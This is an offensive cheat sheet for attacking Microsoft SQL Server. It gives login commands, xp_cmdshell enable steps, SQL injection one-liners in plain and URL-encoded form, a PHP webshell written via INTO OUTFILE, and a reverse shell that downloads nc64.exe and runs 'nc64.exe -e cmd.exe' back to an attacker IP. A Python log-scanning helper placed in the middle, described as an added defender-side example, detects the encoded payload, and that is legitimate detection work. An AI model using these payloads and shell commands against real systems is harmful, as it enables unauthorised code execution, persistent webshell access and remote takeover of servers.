MSSQL (1433)

1. Basics

Initiate connection

sqsh -S <IP> -U <username> -P "<pass>"
sqsh -S <IP> -U .\\<Username> -P <pass> -D <database>

impacket-mssqlclient <username>:<pass>@<IP> -windows-auth
impacket-mssqlclient <username>:<pass>@<IP> -local-auth

2. Reverse Shell

1. Initiate the connection with either impacket-mssqlclient or sqsh
    # In sqsh, you need to type GO after writing the query to send it
Run the commands one at a time:

# Get users that can run xp_cmdshell
    Use master
    EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled
    SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
    sp_configure 'show advanced options', '1'
    RECONFIGURE

# This enables xp_cmdshell
    sp_configure 'xp_cmdshell', '1'
    RECONFIGURE
    EXEC master..xp_cmdshell 'whoami'

Manual Code Execution:

Steps to enable `xp_cmdshell`:
    '; EXEC sp_configure "show advanced options", 1; -- //
    '; RECONFIGURE; -- //
    '; EXEC sp_configure "xp_cmdshell", 1; -- //
    '; RECONFIGURE; -- //

    '; EXEC xp_cmdshell "whoami"; -- //

Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //

URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F
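As an added defender-side example (not part of the original cheat sheet), a small Python helper that percent-decodes request URIs from a web access log and flags the sp_configure / RECONFIGURE / xp_cmdshell chain shown above, covering both the double-quoted and single-quoted forms used on this page; the log lines and IP addresses are constructed.

```python
"""Flag web requests carrying the URL-encoded xp_cmdshell enable chain (added detection example, constructed log)."""
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Indicators are matched case-insensitively against the decoded query string; \W+ absorbs the space and either quote style.
INDICATORS = {
    "show_advanced_options": re.compile(r"sp_configure\W+show advanced options", re.I),
    "enable_xp_cmdshell":    re.compile(r"sp_configure\W+xp_cmdshell\W*,\W*1", re.I),
    "reconfigure":           re.compile(r"\breconfigure\b", re.I),
    "xp_cmdshell_exec":      re.compile(r"\bxp_cmdshell\b", re.I),
}

def normalise(uri: str) -> str:
    """Percent-decode twice (catches double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(uri)))

def scan_uri(uri: str) -> list[str]:
    """Names of indicators present in the decoded URI, in INDICATORS order."""
    text = normalise(uri)
    return [name for name, pat in INDICATORS.items() if pat.search(text)]

def scan_access_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """(client_ip, indicators) for each combined-log-format line that matches."""
    hits = []
    for line in lines:
        fields = line.split('"')            # request line is the second quoted field
        if len(fields) < 2:
            continue
        request = fields[1].split(" ")      # "METHOD URI PROTOCOL"
        if len(request) < 2:
            continue
        found = scan_uri(request[1])
        if found:
            hits.append((line.split(" ", 1)[0], found))
    return hits

# Constructed sample log: one benign request, one carrying the page's encoded one-liner.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=laptops HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search?q=%27%3B%20EXEC%20sp%5Fconfigure'
    '%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure'
    '%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22'
    '%3B%20%2D%2D%20%2F%2F HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, found in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(found)}")
```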

Payload Example:

Insert webshell into web root directory (note: INTO OUTFILE is MySQL syntax, not T-SQL):
    "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"

Initiating reverse shell with nc64.exe via injected webshell:
    curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
    c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>
